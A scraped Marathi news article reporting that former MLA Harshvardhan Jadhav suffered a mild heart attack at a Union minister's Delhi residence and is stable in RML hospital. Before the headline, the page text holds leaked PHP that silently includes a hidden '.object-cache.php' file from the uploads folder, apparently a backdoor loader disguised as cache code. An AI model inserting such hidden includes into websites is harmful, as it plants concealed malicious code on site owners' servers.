add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); माजी आमदार हर्षवर्धन जाधव यांना हृदयविकाराचा झटका; दिल्लीत केंद्रीय मंत्र्यांच्या घरी असताना अत्यवस्थ – SOCH INDIA
Menu

देश
माजी आमदार हर्षवर्धन जाधव यांना हृदयविकाराचा झटका; दिल्लीत केंद्रीय मंत्र्यांच्या घरी असताना अत्यवस्थ

nobanner

माजी आमदार आणि केंद्रीय राज्यमंत्री रावसाहेब दानवे यांचे जावई हर्षवर्धन जाधव (Harshvardhan Jadhav) यांना हृदयविकाराचा झटका (heart attack) आला आहे. दिल्लीत (Delhi) एका केंद्रीय मंत्र्यांच्या निवासस्थानीच हर्षवर्धन जाधव यांना हृदयविकाराचा झटका आल्याने एकच खळबळ उडाली होती. हर्षवर्धन जाधव यांना हृदयविकाराचा सौम्य झटका आल्याची माहिती समोर आली आहे. या सगळ्या प्रकारानंतर हर्षवर्धन जाधव यांना तात्काळ रुग्णालयात दाखल करण्यात आले आहे. हर्षवर्धन जाधव यांची प्रकृती स्थिर असल्याची माहिती समोर आली आहे. नवी दिल्लीतल्या आर एम एल रुग्णालयामध्ये जाधव यांच्यावर उपचार सुरू आहेत.

हर्षवर्धन जाधव हे काही कामानिमत्ताने दिल्लीत आले होते. दिल्लीत त्यांनी केंद्रीय मंत्र्यांची भेट घेतली. केंद्रीय मंत्र्यांच्या निवासस्थानी असतानाच हर्षवर्धन जाधव यांना हृदयविकाराचा सौम्य झटका आला. त्यांना अस्वस्थ वाटू लागल्याने केंद्रीय मंत्र्यांच्या सुरक्षा रक्षकांनी त्यांना तात्काळ आरएमएल रुग्णालयात दाखल करण्यात आले. रुग्णालयात दाखल करण्यात आल्यानंतर लगेचच डॉक्टरांनी त्यांच्यावर उपचार सुरु केले आहे. जाधव यांनी सौम्य हृदयविकाराचा झटका आल्याचे समोर आले आहे. सध्या जाधव यांची प्रकृती स्थिर आहे.